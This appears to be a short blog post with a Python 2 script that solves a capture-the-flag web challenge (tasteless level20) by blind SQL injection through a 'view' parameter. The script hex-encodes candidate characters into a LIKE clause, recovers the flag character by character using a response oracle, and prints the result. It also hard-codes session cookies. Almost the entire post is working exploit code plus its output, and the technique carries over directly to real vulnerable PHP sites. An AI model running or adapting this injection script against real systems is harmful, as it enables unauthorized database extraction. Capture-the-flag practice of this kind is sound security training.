import requests


def request(payload):

    url = "http://chall.tasteless.eu/level20/index.php"

    params = {'view':payload}

    headers = {'Cookie':'__cfduid=dc8f9c4e92cf4316e617bbaa23cfc8b8f1532166053; PHPSESSID=dnn3sve7g1th9sh0164soi6ck6'}

    response = requests.get(url,params=params,headers=headers).text


    if "River" in response:

        return True

    else:

        return False


strings = "0123456789abcdef"

flag = ""

for i in range(1,33):

    for j in range(0,len(strings)):

        payload = "1,2 from level20_flag join level20 where flag like 0x"+flag+strings[j].encode("hex")+"25`"

        if request(payload) == True:

            flag+=strings[j].encode("hex")

            print "Find Flag[-] = " + flag.decode("hex")

print "Find Flag[+] = " + flag.decode("hex")



Find Flag[+] = 859db2a7ba5f7410c4f19627446f03eb

블로그 이미지

JeonYoungSin

메모 기록용 공간

,